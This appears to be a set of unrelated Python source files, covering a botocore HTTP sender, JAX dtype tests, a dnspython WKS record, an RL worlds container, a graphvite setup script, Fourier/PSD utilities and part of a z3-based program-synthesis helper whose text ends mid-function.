# this way instead of using preload_content because
# preload_content will never buffer chunked responses
http_response.content
return http_response
except URLLib3SSLError as e:
raise SSLError(endpoint_url=request.url, error=e)
except (NewConnectionError, socket.gaierror) as e:
raise EndpointConnectionError(endpoint_url=request.url, error=e)
except ProxyError as e:
raise ProxyConnectionError(proxy_url=proxy_url, error=e)
except URLLib3ConnectTimeoutError as e:
raise ConnectTimeoutError(endpoint_url=request.url, error=e)
except URLLib3ReadTimeoutError as e:
raise ReadTimeoutError(endpoint_url=request.url, error=e)
except ProtocolError as e:
raise ConnectionClosedError(
error=e,
request=request,
endpoint_url=request.url
)
except Exception as e:
message = 'Exception received when sending urllib3 HTTP request'
logger.debug(message, exc_info=True)
raise HTTPClientError(error=e)
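# --- Illustrative sketch (assumption: this __main__ block is not part of
# ibm_botocore) ---
# ProxyConfiguration can be exercised on its own: it picks the proxy for a
# URL's scheme, normalises bare host:port values to http:// URLs, and derives a
# Proxy-Authorization header when credentials are embedded in the proxy URL.
if __name__ == '__main__':
    config = ProxyConfiguration(proxies={'https': 'user:secret@proxy.local:8080'})
    proxy_url = config.proxy_url_for('https://example.com/some/path')
    print(proxy_url)                            # http://user:secret@proxy.local:8080
    print(config.proxy_headers_for(proxy_url))  # {'Proxy-Authorization': 'Basic ...'}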
|
the-stack_106_15905
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import itertools
import operator
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as onp
import jax
from jax import dtypes
from jax import numpy as np
from jax import test_util as jtu
from jax.interpreters import xla
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS
bool_dtypes = [onp.dtype('bool')]
signed_dtypes = [onp.dtype('int8'), onp.dtype('int16'), onp.dtype('int32'),
onp.dtype('int64')]
unsigned_dtypes = [onp.dtype('uint8'), onp.dtype('uint16'), onp.dtype('uint32'),
onp.dtype('uint64')]
onp_float_dtypes = [onp.dtype('float16'), onp.dtype('float32'),
onp.dtype('float64')]
float_dtypes = [onp.dtype(dtypes.bfloat16)] + onp_float_dtypes
complex_dtypes = [onp.dtype('complex64'), onp.dtype('complex128')]
all_dtypes = (bool_dtypes + signed_dtypes + unsigned_dtypes + float_dtypes +
complex_dtypes)
scalar_types = [np.bool_, np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64,
np.bfloat16, np.float16, np.float32, np.float64,
np.complex64, np.complex128]
class DtypesTest(jtu.JaxTestCase):
@parameterized.named_parameters(
{"testcase_name": "_type={}".format(type.__name__), "type": type,
"dtype": dtype}
for type, dtype in [(bool, np.bool_), (int, np.int_), (float, np.float_),
(complex, np.complex_)])
def testDefaultTypes(self, type, dtype):
for f in [np.array, jax.jit(np.array), jax.jit(lambda x: x)]:
y = f(type(0))
self.assertTrue(isinstance(y, np.ndarray), msg=(f, y))
self.assertEqual(y.dtype, dtypes.canonicalize_dtype(dtype), msg=(f, y))
@parameterized.named_parameters(
{"testcase_name": "_swap={}_jit={}".format(swap, jit),
"swap": swap, "jit": jit}
for swap in [False, True] for jit in [False, True])
@jtu.skip_on_devices("tpu") # F16 not supported on TPU
def testBinaryPromotion(self, swap, jit):
testcases = [
(np.array(1.), 0., np.float_),
(np.array(1.), np.array(0.), np.float_),
(np.array(1.), np.array(0., dtype=np.float16), np.float_),
(np.array(1.), np.array(0., dtype=np.float32), np.float_),
(np.array(1.), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float16), 0., np.float16),
(np.array(1., dtype=np.float32), 0., np.float32),
(np.array(1., dtype=np.float64), 0., np.float64),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float16), np.float16),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float32), np.float32),
(np.array(1., dtype=np.float16), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float32), np.array(0., dtype=np.float32), np.float32),
(np.array(1., dtype=np.float32), np.array(0., dtype=np.float64), np.float64),
(np.array(1., dtype=np.float64), np.array(0., dtype=np.float64), np.float64),
(np.array([1.]), 0., np.float_),
(np.array([1.]), np.array(0.), np.float_),
(np.array([1.]), np.array(0., dtype=np.float16), np.float_),
(np.array([1.]), np.array(0., dtype=np.float32), np.float_),
(np.array([1.]), np.array(0., dtype=np.float64), np.float64),
(np.array([1.], dtype=np.float32), np.array(0., dtype=np.float16), np.float32),
(np.array([1.], dtype=np.float16), np.array(0., dtype=np.float32), np.float32),
(np.array([1.], dtype=np.float16), 0., np.float16),
]
op = jax.jit(operator.add) if jit else operator.add
for x, y, dtype in testcases:
x, y = (y, x) if swap else (x, y)
z = x + y
self.assertTrue(isinstance(z, np.ndarray), msg=(x, y, z))
self.assertEqual(z.dtype, dtypes.canonicalize_dtype(dtype), msg=(x, y, z))
def testPromoteDtypes(self):
for t1 in all_dtypes:
self.assertEqual(t1, dtypes.promote_types(t1, t1))
self.assertEqual(t1, dtypes.promote_types(t1, onp.bool_))
self.assertEqual(onp.dtype(onp.complex128),
dtypes.promote_types(t1, onp.complex128))
for t2 in all_dtypes:
# Symmetry
self.assertEqual(dtypes.promote_types(t1, t2),
dtypes.promote_types(t2, t1))
self.assertEqual(onp.dtype(onp.float32),
dtypes.promote_types(onp.float16, dtypes.bfloat16))
# Promotions of non-inexact types against inexact types always prefer
# the inexact types.
for t in float_dtypes + complex_dtypes:
for i in bool_dtypes + signed_dtypes + unsigned_dtypes:
self.assertEqual(t, dtypes.promote_types(t, i))
# Promotions between exact types, or between inexact types, match NumPy.
for groups in [bool_dtypes + signed_dtypes + unsigned_dtypes,
onp_float_dtypes + complex_dtypes]:
for t1, t2 in itertools.combinations(groups, 2):
self.assertEqual(onp.promote_types(t1, t2),
dtypes.promote_types(t1, t2))
def testScalarInstantiation(self):
for t in [np.bool_, np.int32, np.bfloat16, np.float32, np.complex64]:
a = t(1)
self.assertEqual(a.dtype, np.dtype(t))
self.assertIsInstance(a, xla.DeviceArray)
self.assertEqual(0, np.ndim(a))
def testIsSubdtype(self):
for t in scalar_types:
self.assertTrue(dtypes.issubdtype(t, t))
self.assertTrue(dtypes.issubdtype(onp.dtype(t).type, t))
self.assertTrue(dtypes.issubdtype(t, onp.dtype(t).type))
if t != np.bfloat16:
for category in [onp.generic, np.inexact, np.integer, np.signedinteger,
np.unsignedinteger, np.floating, np.complexfloating]:
self.assertEqual(dtypes.issubdtype(t, category),
onp.issubdtype(onp.dtype(t).type, category))
self.assertEqual(dtypes.issubdtype(t, category),
onp.issubdtype(onp.dtype(t).type, category))
def testArrayCasts(self):
for t in [np.bool_, np.int32, np.bfloat16, np.float32, np.complex64]:
a = onp.array([1, 2.5, -3.7])
self.assertEqual(a.astype(t).dtype, np.dtype(t))
self.assertEqual(np.array(a).astype(t).dtype, np.dtype(t))
def testEnumPromotion(self):
class AnEnum(enum.IntEnum):
A = 42
B = 101
onp.testing.assert_equal(onp.array(42), onp.array(AnEnum.A))
onp.testing.assert_equal(np.array(42), np.array(AnEnum.A))
onp.testing.assert_equal(onp.int32(101), onp.int32(AnEnum.B))
onp.testing.assert_equal(np.int32(101), np.int32(AnEnum.B))
if __name__ == "__main__":
absltest.main()
|
the-stack_106_15906
|
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import struct
import dns.ipv4
import dns.rdata
_proto_tcp = socket.getprotobyname('tcp')
_proto_udp = socket.getprotobyname('udp')
class WKS(dns.rdata.Rdata):
"""WKS record
@ivar address: the address
@type address: string
@ivar protocol: the protocol
@type protocol: int
@ivar bitmap: the bitmap
@type bitmap: string
@see: RFC 1035"""
__slots__ = ['address', 'protocol', 'bitmap']
def __init__(self, rdclass, rdtype, address, protocol, bitmap):
super(WKS, self).__init__(rdclass, rdtype)
self.address = address
self.protocol = protocol
self.bitmap = bitmap
def to_text(self, origin=None, relativize=True, **kw):
bits = []
for i in xrange(0, len(self.bitmap)):
byte = ord(self.bitmap[i])
for j in xrange(0, 8):
if byte & (0x80 >> j):
bits.append(str(i * 8 + j))
text = ' '.join(bits)
return '%s %d %s' % (self.address, self.protocol, text)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
address = tok.get_string()
protocol = tok.get_string()
if protocol.isdigit():
protocol = int(protocol)
else:
protocol = socket.getprotobyname(protocol)
bitmap = []
while 1:
token = tok.get().unescape()
if token.is_eol_or_eof():
break
if token.value.isdigit():
serv = int(token.value)
else:
if protocol != _proto_udp and protocol != _proto_tcp:
raise NotImplementedError("protocol must be TCP or UDP")
if protocol == _proto_udp:
protocol_text = "udp"
else:
protocol_text = "tcp"
serv = socket.getservbyname(token.value, protocol_text)
i = serv // 8
l = len(bitmap)
if l < i + 1:
for j in xrange(l, i + 1):
bitmap.append('\x00')
bitmap[i] = chr(ord(bitmap[i]) | (0x80 >> (serv % 8)))
bitmap = dns.rdata._truncate_bitmap(bitmap)
return cls(rdclass, rdtype, address, protocol, bitmap)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
file.write(dns.ipv4.inet_aton(self.address))
protocol = struct.pack('!B', self.protocol)
file.write(protocol)
file.write(self.bitmap)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
address = dns.ipv4.inet_ntoa(wire[current : current + 4])
protocol, = struct.unpack('!B', wire[current + 4 : current + 5])
current += 5
rdlen -= 5
bitmap = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, address, protocol, bitmap)
from_wire = classmethod(from_wire)
def _cmp(self, other):
sa = dns.ipv4.inet_aton(self.address)
oa = dns.ipv4.inet_aton(other.address)
v = cmp(sa, oa)
if v == 0:
sp = struct.pack('!B', self.protocol)
op = struct.pack('!B', other.protocol)
v = cmp(sp, op)
if v == 0:
v = cmp(self.bitmap, other.bitmap)
return v
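# --- Illustrative sketch (assumption: this __main__ block is not part of
# dnspython) ---
# The bitmap packs one bit per port: in byte i, the bit (0x80 >> j) marks port
# i * 8 + j. Byte 3 == 0x40 therefore advertises port 3 * 8 + 1 = 25, and the
# record below renders as "10.0.0.1 6 25" (rdclass 1 = IN, rdtype 11 = WKS).
if __name__ == '__main__':
    rdata = WKS(1, 11, '10.0.0.1', _proto_tcp, '\x00\x00\x00\x40')
    print(rdata.to_text())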
|
the-stack_106_15912
|
"""
Groups a batch_size block of worlds together; can run act, reset etc on entire batch
"""
import torch
import numpy as np
from ulfs import alive_sieve
from ulfs.rl_common import cudarize
class WorldsContainer(object):
"""
Contains a bunch of worlds, runs action tensor against them, and returns
rewards, dead_mask, and next_states tensor
public properties:
- global_rewards C
- states C
- done
- timesteps C
- rewards C
- alive_masks C
('C' means 'cudarized by .cuda()')
"""
def __init__(self, world_constructor, world_constructor_kwargs, batch_size, max_steps):
self.all_worlds = []
self.batch_size = batch_size
self.enable_cuda = False
self.max_steps = max_steps
for n in range(batch_size):
# print('worlds constructor seed', seed)
# if seed is not None:
# world_constructor_kwargs['seed'] = seed + n
world = world_constructor(**world_constructor_kwargs)
self.all_worlds.append(world)
self.type_constr = torch
self.reset(seeds=list(range(self.batch_size)))
def cuda(self):
self.enable_cuda = True
self.type_constr = torch.cuda
return self
def reset(self, seeds):
# print('worlds_container.reset()')
self.worlds = list(self.all_worlds)
self.sieve = alive_sieve.AliveSieve(
batch_size=self.batch_size, enable_cuda=self.enable_cuda)
self.global_timesteps = torch.LongTensor(self.batch_size).fill_(self.max_steps)
self.global_rewards = self.type_constr.FloatTensor(self.batch_size).fill_(0) # full-length, never sieved
# self.timesteps = cudarize(self.timesteps)
if self.enable_cuda:
self.global_timesteps = self.global_timesteps.cuda()
states = torch.zeros(
self.batch_size, *self.worlds[0].state_size)
for b in range(self.batch_size):
states[b] = self.worlds[b].reset(seed=None if seeds is None else seeds[b])
# states = cudarize(states)
# self.global_rewards = cudarize(self.global_rewards)
if self.enable_cuda:
states = states.cuda()
self.global_rewards = self.global_rewards.cuda()
self.t = 0
self.states = states
self.done = False
self.alive_masks = []
return states
def act(self, actions):
"""
actions should be 1-dimensional, can be cuda (we'll cpu it)
"""
actions = actions.cpu()
batch_size = self.sieve.batch_size
rewards = torch.FloatTensor(batch_size).fill_(0)
dead_mask = torch.ByteTensor(batch_size).fill_(0)
states = torch.zeros(batch_size, *self.worlds[0].state_size)
for b in range(batch_size):
_render = False
# if render and sieve.alive_idxes[0] == 0:
# _render = True
# loc = worlds[b].agent_loc
# positions_visited[b][loc[0], loc[1]] = 1
_reward, _done = self.worlds[b].act(actions[b].item(), render=_render)
rewards[b] = _reward
dead_mask[b] = int(_done)
states[b] = self.worlds[b].get_state()
self.sieve.mark_dead(dead_mask)
self.alive_masks.append(self.sieve.alive_mask.clone())
dead_idxes = self.sieve.get_dead_idxes()
if len(dead_idxes) > 0:
self.global_timesteps[self.sieve.global_idxes[dead_idxes]] = self.t + 1
rewards = cudarize(rewards)
dead_mask = cudarize(dead_mask)
states = cudarize(states)
if self.enable_cuda:
rewards = rewards.cuda()
states = states.cuda()
dead_mask = dead_mask.cuda()
self.global_rewards[self.sieve.global_idxes] += rewards
self.rewards = rewards
self.dead_mask = dead_mask
self.states = states
self.done = self.sieve.all_dead()
return rewards, dead_mask, states, self.done
def next_timestep(self):
self.worlds = self.sieve.sieve_list(self.worlds)
self.states = self.sieve.sieve_tensor(self.states)
self.sieve.self_sieve_()
self.rewards = None
self.dead_mask = None
self.t += 1
return self.states
@property
def global_idxes(self):
return self.sieve.global_idxes
@property
def state_size(self):
return self.worlds[0].state_size
@property
def action_space(self):
return self.worlds[0].action_space
def get_int_tensor(self, attribute_name):
values = [getattr(world, attribute_name) for world in self.worlds]
res = torch.IntTensor(values)
return res
def get_full_int_tensor(self, attribute_name):
values = [getattr(world, attribute_name) for world in self.all_worlds]
res = torch.IntTensor(values)
return res
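# --- Illustrative usage sketch (assumption: ToyWorld and the driver loop below
# are not part of this module) ---
# Shows the intended call pattern: construct the container, read .states, call
# act() with one action per still-alive world, then next_timestep() to sieve
# out finished worlds, until .done is set.
if __name__ == '__main__':
    class ToyWorld(object):
        state_size = (2,)
        action_space = 2

        def __init__(self, episode_len=3):
            self.episode_len = episode_len
            self.t = 0

        def reset(self, seed=None):
            self.t = 0
            return torch.zeros(*self.state_size)

        def act(self, action, render=False):
            self.t += 1
            return float(action), self.t >= self.episode_len

        def get_state(self):
            return torch.full(self.state_size, float(self.t))

    container = WorldsContainer(ToyWorld, {'episode_len': 3}, batch_size=4, max_steps=10)
    states = container.states
    while not container.done:
        actions = torch.ones(states.size(0), dtype=torch.int64)
        rewards, dead_mask, states, done = container.act(actions)
        if not done:
            states = container.next_timestep()
    print('episode rewards:', container.global_rewards)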
|
the-stack_106_15913
|
# Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
from __future__ import print_function, absolute_import
import os
from setuptools import setup, find_packages
from graphvite import __version__, lib_path, lib_file
name = "graphvite"
# faiss_file = os.path.join(lib_path, "libfaiss.so")
project_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
# library files
install_path = os.path.join(name, "lib")
data_files = [(install_path, [lib_file])]
# configuration files
for path, dirs, files in os.walk(os.path.join(project_path, "config")):
install_path = os.path.join(name, os.path.relpath(path, project_path))
files = [os.path.join(path, file) for file in files]
data_files.append((install_path, files))
setup(
name=name,
version=__version__,
description="",
packages=find_packages(),
data_files=data_files,
entry_points={"console_scripts": ["graphvite = graphvite.cmd:main"]},
zip_safe=False,
#install_requires=["numpy", "pyyaml", "easydict", "six", "future"],
#extras_requires={"app": ["imageio", "psutil", "scipy", "matplotlib", "torch", "torchvision", "nltk"]}
)
|
the-stack_106_15915
|
import numpy as np
try:
# use scipy if available: it's faster
from scipy.fftpack import fft, ifft, fftshift
except ImportError:
from numpy.fft import fft, ifft, fftshift
def FT_continuous(t, h, axis=-1, method=1):
r"""Approximate a continuous 1D Fourier Transform with sampled data.
This function uses the Fast Fourier Transform to approximate
the continuous fourier transform of a sampled function, using
the convention
.. math::
H(f) = \int h(t) exp(-2 \pi i f t) dt
It returns f and H, which approximate H(f).
Parameters
----------
t : array_like
regularly sampled array of times
t is assumed to be regularly spaced, i.e.
t = t0 + Dt * np.arange(N)
h : array_like
real or complex signal at each time
axis : int
axis along which to perform fourier transform.
This axis must be the same length as t.
Returns
-------
f : ndarray
frequencies of result. Units are the same as 1/t
H : ndarray
Fourier coefficients at each frequency.
"""
assert t.ndim == 1
assert h.shape[axis] == t.shape[0]
N = len(t)
if N % 2 != 0:
raise ValueError("number of samples must be even")
Dt = t[1] - t[0]
Df = 1. / (N * Dt)
t0 = t[N // 2]
f = Df * (np.arange(N) - N // 2)
shape = np.ones(h.ndim, dtype=int)
shape[axis] = N
phase = np.ones(N)
phase[1::2] = -1
phase = phase.reshape(shape)
if method == 1:
H = Dt * fft(h * phase, axis=axis)
else:
H = Dt * fftshift(fft(h, axis=axis), axes=axis)
H *= phase
H *= np.exp(-2j * np.pi * t0 * f.reshape(shape))
H *= np.exp(-1j * np.pi * N / 2)
return f, H
def IFT_continuous(f, H, axis=-1, method=1):
"""Approximate a continuous 1D Inverse Fourier Transform with sampled data.
This function uses the Fast Fourier Transform to approximate
    the continuous inverse fourier transform of a sampled function, using
the convention
.. math::
        H(f) = \int h(t) exp(-2 \pi i f t) dt
        h(t) = \int H(f) exp(2 \pi i f t) df
It returns t and h, which approximate h(t).
Parameters
----------
    f : array_like
        regularly sampled array of frequencies
        f is assumed to be regularly spaced, i.e.
        f = f0 + Df * np.arange(N)
    H : array_like
        real or complex Fourier coefficients at each frequency
    axis : int
        axis along which to perform the inverse fourier transform.
        This axis must be the same length as f.
    Returns
    -------
    t : ndarray
        times of result. Units are the same as 1/f
    h : ndarray
        real or complex signal at each time.
"""
assert f.ndim == 1
assert H.shape[axis] == f.shape[0]
N = len(f)
if N % 2 != 0:
raise ValueError("number of samples must be even")
f0 = f[0]
Df = f[1] - f[0]
t0 = -0.5 / Df
Dt = 1. / (N * Df)
t = t0 + Dt * np.arange(N)
shape = np.ones(H.ndim, dtype=int)
shape[axis] = N
t_calc = t.reshape(shape)
f_calc = f.reshape(shape)
H_prime = H * np.exp(2j * np.pi * t0 * f_calc)
h_prime = ifft(H_prime, axis=axis)
h = N * Df * np.exp(2j * np.pi * f0 * (t_calc - t0)) * h_prime
return t, h
def PSD_continuous(t, h, axis=-1, method=1):
r"""Approximate a continuous 1D Power Spectral Density of sampled data.
This function uses the Fast Fourier Transform to approximate
the continuous fourier transform of a sampled function, using
the convention
.. math::
H(f) = \int h(t) \exp(-2 \pi i f t) dt
It returns f and PSD, which approximate PSD(f) where
.. math::
PSD(f) = |H(f)|^2 + |H(-f)|^2
Parameters
----------
t : array_like
regularly sampled array of times
t is assumed to be regularly spaced, i.e.
t = t0 + Dt * np.arange(N)
h : array_like
real or complex signal at each time
axis : int
axis along which to perform fourier transform.
This axis must be the same length as t.
Returns
-------
f : ndarray
frequencies of result. Units are the same as 1/t
PSD : ndarray
        Power Spectral Density at each frequency.
"""
assert t.ndim == 1
assert h.shape[axis] == t.shape[0]
N = len(t)
if N % 2 != 0:
raise ValueError("number of samples must be even")
ax = axis % h.ndim
if method == 1:
# use FT_continuous
f, Hf = FT_continuous(t, h, axis)
Hf = np.rollaxis(Hf, ax)
f = -f[N // 2::-1]
PSD = abs(Hf[N // 2::-1]) ** 2
PSD[:-1] += abs(Hf[N // 2:]) ** 2
PSD = np.rollaxis(PSD, 0, ax + 1)
else:
# A faster way to do it is with fftshift
# take advantage of the fact that phases go away
Dt = t[1] - t[0]
Df = 1. / (N * Dt)
f = Df * np.arange(N // 2 + 1)
Hf = fft(h, axis=axis)
Hf = np.rollaxis(Hf, ax)
PSD = abs(Hf[:N // 2 + 1]) ** 2
PSD[-1] = 0
PSD[1:] += abs(Hf[N // 2:][::-1]) ** 2
PSD[0] *= 2
PSD = Dt ** 2 * np.rollaxis(PSD, 0, ax + 1)
return f, PSD
def sinegauss(t, t0, f0, Q):
"""Sine-gaussian wavelet"""
a = (f0 * 1. / Q) ** 2
return (np.exp(-a * (t - t0) ** 2)
* np.exp(2j * np.pi * f0 * (t - t0)))
def sinegauss_FT(f, t0, f0, Q):
"""Fourier transform of the sine-gaussian wavelet.
This uses the convention
.. math::
        H(f) = \int h(t) exp(-2 \pi i f t) dt
"""
a = (f0 * 1. / Q) ** 2
return (np.sqrt(np.pi / a)
* np.exp(-2j * np.pi * f * t0)
* np.exp(-np.pi ** 2 * (f - f0) ** 2 / a))
def sinegauss_PSD(f, t0, f0, Q):
"""Compute the PSD of the sine-gaussian function at frequency f
.. math::
PSD(f) = |H(f)|^2 + |H(-f)|^2
"""
a = (f0 * 1. / Q) ** 2
Pf = np.pi / a * np.exp(-2 * np.pi ** 2 * (f - f0) ** 2 / a)
Pmf = np.pi / a * np.exp(-2 * np.pi ** 2 * (-f - f0) ** 2 / a)
return Pf + Pmf
def wavelet_PSD(t, h, f0, Q=1.0):
"""Compute the wavelet PSD as a function of f0 and t
Parameters
----------
t : array_like
array of times, length N
h : array_like
array of observed values, length N
f0 : array_like
array of candidate frequencies, length Nf
Q : float
Q-parameter for wavelet
Returns
-------
PSD : ndarray
The 2-dimensional PSD, of shape (Nf, N), corresponding with
frequencies f0 and times t.
"""
t, h, f0 = map(np.asarray, (t, h, f0))
if (t.ndim != 1) or (t.shape != h.shape):
raise ValueError('t and h must be one dimensional and the same shape')
if f0.ndim != 1:
raise ValueError('f0 must be one dimensional')
Q = Q + np.zeros_like(f0)
f, H = FT_continuous(t, h)
W = np.conj(sinegauss_FT(f, 0, f0[:, None], Q[:, None]))
_, HW = IFT_continuous(f, H * W)
return abs(HW) ** 2
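# --- Illustrative sanity check (assumption: this __main__ block is not part of
# the original module) ---
# With the convention H(f) = int h(t) exp(-2 pi i f t) dt, the Gaussian
# h(t) = exp(-pi t^2) transforms to H(f) = exp(-pi f^2); the printed maximum
# deviation from that analytic result should be close to machine precision.
if __name__ == '__main__':
    t = -10 + 0.01 * np.arange(2000)
    h = np.exp(-np.pi * t ** 2)
    f, H = FT_continuous(t, h)
    print(np.max(np.abs(H.real - np.exp(-np.pi * f ** 2))))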
|
the-stack_106_15916
|
from z3 import *
import jry2.translator as translator
import random
def getId(type, id):
return type + str(id)
def declareVar(type, id, VarTable):
newVar = translator.DeclareVar(type, id)
# print "declareVar", id, newVar, type
VarTable[str(newVar)] = newVar
return newVar
def replaceFunctionCall(Term, functionCallDic, functionName, outputType, VarTable):
if not type(Term) == list:
if type(Term) == tuple:
return [[], str(Term[1])]
else:
return [[], Term]
resTerm = [[], []]
for term in Term:
if type(term) == list and term[0] == functionName:
newArguments = []
for arg in term[1:]:
subCall, subTerm = replaceFunctionCall(arg, functionCallDic, functionName, outputType, VarTable)
for call in subCall:
if call not in resTerm[0]:
resTerm[0].append(call)
newArguments.append(subTerm)
# print newArguments
if str(newArguments) in functionCallDic:
functionCallVar = functionCallDic[str(newArguments)][0]
resTerm[0].append(str(functionCallVar))
resTerm[1].append(str(functionCallVar))
else:
id = len(functionCallDic)
currentOutput = declareVar(outputType, "functionCall%d"%(id), VarTable)
functionCallDic[str(newArguments)] = [currentOutput, newArguments]
if str(currentOutput) not in resTerm[0]:
resTerm[0].append(str(currentOutput))
resTerm[0].append(str(currentOutput))
resTerm[1].append(str(currentOutput))
elif type(term) == list:
subCall, subTerm = replaceFunctionCall(term, functionCallDic, functionName, outputType, VarTable)
for call in subCall:
if call not in resTerm[0]:
resTerm[0].append(call)
resTerm[1].append(subTerm)
else:
resTerm[1].append(term)
return resTerm
def replaceCons(Cons, s1, s2):
if type(Cons) != list:
if Cons == s1:
return s2
return Cons
return list(map(lambda x: replaceCons(x, s1, s2), Cons))
def simplifyOperator(Operators):
simpleOperators = []
# print(Operators)
for operatorType in Operators:
isBool = operatorType[1] == 'Bool'
isInt = operatorType[1] == 'Int'
# print(operatorType)
for arg in operatorType[2]:
if arg != ['Bool']:
isBool = False
if arg != ['Int']:
isInt = False
if isBool:
continue
resultOperator = []
for operator in operatorType[0]:
if operator == '<' and '>' in resultOperator: continue
if operator == '>' and '<' in resultOperator: continue
if operator == '<=' and '>=' in resultOperator: continue
if operator == '>=' and '<=' in resultOperator: continue
resultOperator.append(operator)
simpleOperators.append([resultOperator] + operatorType[1:])
return simpleOperators
def replaceTerm(term, s, t):
resultTerm = []
if term == s:
return t
if type(term) != list:
return term
for subTerm in term:
resultTerm.append(replaceTerm(subTerm, s, t))
return resultTerm
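# Minimal sketch (illustrative, not part of the original module): exercise the
# pure list-manipulation helpers above on toy S-expression style terms.  The
# term and operator table below are made-up examples, not real SyGuS input.
if __name__ == "__main__":
    toy_term = ['+', 'x', ['ite', ['<', 'x', 'y'], 'x', 'y']]
    print(replaceTerm(toy_term, 'x', '0'))   # every 'x' leaf becomes '0'
    toy_ops = [[['<', '>', '<='], 'Bool', [['Int'], ['Int']]],
               [['and', 'or'], 'Bool', [['Bool'], ['Bool']]]]
    print(simplifyOperator(toy_ops))         # all-Bool ops and mirrored comparisons dropped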
def dfsGetPossibleValueCons(currentSet, functionCalls, Args, VarTable, currentFunctionCall, ReplacedCons):
if len(functionCalls) == 0:
spec = "\n".join(list(map(lambda x: "(assert %s)"%(translator.toString(x[1:])), ReplacedCons)))
result = parse_smt2_string(spec, decls=VarTable)
return [Not(And(result))]
functionVar, functionArgs = functionCalls[0]
if str(functionVar) not in currentFunctionCall:
return dfsGetPossibleValueCons(currentSet, functionCalls[1:], Args, VarTable, currentFunctionCall, ReplacedCons)
result = []
for value in currentSet:
newTerm = value
for i in range(len(Args)):
newTerm = replaceTerm(newTerm, Args[i][0], functionArgs[i])
result += dfsGetPossibleValueCons(currentSet, functionCalls[1:], Args, VarTable, currentFunctionCall,
list(map(lambda x: replaceTerm(x, str(functionVar), newTerm), ReplacedCons)))
return result
def isValueSetFull(currentSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
solver = Solver()
functionCallInfo = [functionCallDic[i] for i in functionCallDic]
allCons = []
for ReplacedCons in ReplacedConsSet:
allCons.append(And(dfsGetPossibleValueCons(currentSet, functionCallInfo, ArgumentDict, VarTable,
ReplacedCons[0], ReplacedCons[1])))
solver.add(Or(allCons))
# print(solver)
# print(solver.check())
return solver.check() == unsat
def simplifyResultSet(resultSet, superSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
#print(len(resultSet), len(superSet))
if isValueSetFull(superSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
return []
if len(resultSet) == 1:
return resultSet
middle = len(resultSet) // 2
leftSet = resultSet[: middle]
rightSet = resultSet[middle:]
left = simplifyResultSet(leftSet, superSet + rightSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet)
right = simplifyResultSet(rightSet, superSet + left, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet)
return left + right
def getConsSet(ConsInfo):
functionCallDic = {}
functionCallId = 1
loc = [0]
consSet =[[[],[]]]
# pprint.pprint(ConsInfo)
for consInfo in ConsInfo:
for functionName in consInfo[0]:
if not functionName in functionCallDic:
functionCallDic[functionName] = functionCallId
loc.append(functionCallId)
consSet.append([[functionName], []])
functionCallId += 1
for functionCalls, Cons in ConsInfo:
location = 0
if len(functionCalls) > 0:
location = loc[functionCallDic[functionCalls[0]]]
for functionCall in functionCalls:
where = loc[functionCallDic[functionCall]]
if where != location:
consSet[location][0].extend(consSet[where][0])
consSet[location][1].extend(consSet[where][1])
for functionName in consSet[where][0]:
loc[functionCallDic[functionName]] = location
consSet[where] = [[], []]
consSet[location][1].append(Cons)
result = []
for cons in consSet:
if len(cons[1]) > 0:
result.append(cons)
return result
def chcekMerge(operator, lTerm, rTerm):
if operator in ['mod', 'div']:
if type(rTerm) != str:
return False
try:
int(rTerm)
except:
return False
return True
return True
class ValueSet:
def __init__(self, argVarTable, Samples, Operators):
self.VarTable = argVarTable
self.Samples = Samples
self.Operators = Operators
self.hashTable = {}
self.Value = [[]]
def get(self, depth):
while len(self.Value) <= depth:
self.extendValue()
return self.Value[depth]
def addNewValue(self, var, depth):
resultVar = self.VarTable["__result"]
spec = "(assert (= %s %s))"%(str(resultVar), translator.toString(var))
result = parse_smt2_string(spec, decls=self.VarTable)
